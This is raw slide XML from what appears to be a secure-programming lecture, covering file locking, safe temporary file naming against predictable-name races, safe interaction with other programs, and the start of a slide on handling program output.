                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>need suitable synchronization</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mechanisms</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i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lock on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>shared</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>file</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Alternatives</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>lockfile - create/check, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>advisory,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>atomic</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advisory file lock - </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>flock</a:t>
            </a:r>
            <a:endParaRPr sz="28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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mandatory file lock - </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>fcntl, need</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>release</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="295"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>later mechanisms vary between</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-75" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>O/S</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1270000" lvl="2" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="1269365" algn="l"/>
                <a:tab pos="1270000" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>have subtle </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>complexities in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:endParaRPr sz="24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40</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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133598" y="1006855"/>
            <a:ext cx="3790950" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Safe </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>Temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Files</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1909826"/>
            <a:ext cx="7446009" cy="4803140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="58419" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="459"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Many programs use temporary</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>files</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Often they are in common, shared system</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>area</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Must be unique, not accessed by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>others</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Common to create a name using process</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:endParaRPr sz="30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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unique, but</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-25" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>predictable</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" marR="5080" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="725"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>might guess and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attempt to create</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-150" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>own  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>between program checking and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>creating</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="310"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Secure temp files need random</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-30" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>names</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>some </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>older functions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>unsafe</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must need correct permissions on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>file/dir</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41</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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681732" y="1006855"/>
            <a:ext cx="4694555" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Other </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Interaction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="1909826"/>
            <a:ext cx="7462520" cy="4417695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="58419" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="459"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Programs often use services of other</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>programs</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Must </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>identify/verify </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>assumptions </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="359"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Especially older user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="15" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>programs</a:t>
            </a:r>
            <a:endParaRPr sz="30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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>now used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>within web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-45" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>interfaces</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>must ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>safe </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>usage of these</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>programs</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dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Issue of data confidentiality / integrity</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>within </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>system use </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>pipe / temp</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>file</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across net use IPSec, TLS/SSL, SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-125" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>etc</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spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detect / handle exceptions /</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>errors</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42</a:t>
            </a:fld>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Arial"/>
              <a:cs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725166" y="1006855"/>
            <a:ext cx="4607560" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Handling </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Program</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="993139" y="2061442"/>
            <a:ext cx="7174865" cy="2473960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="59055" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="465"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>A final concern is program</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-195" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="755650" lvl="1" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="345"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="755015" algn="l"/>
                <a:tab pos="755650" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>stored </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>for future use, sent over net,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-160" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>displayed</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
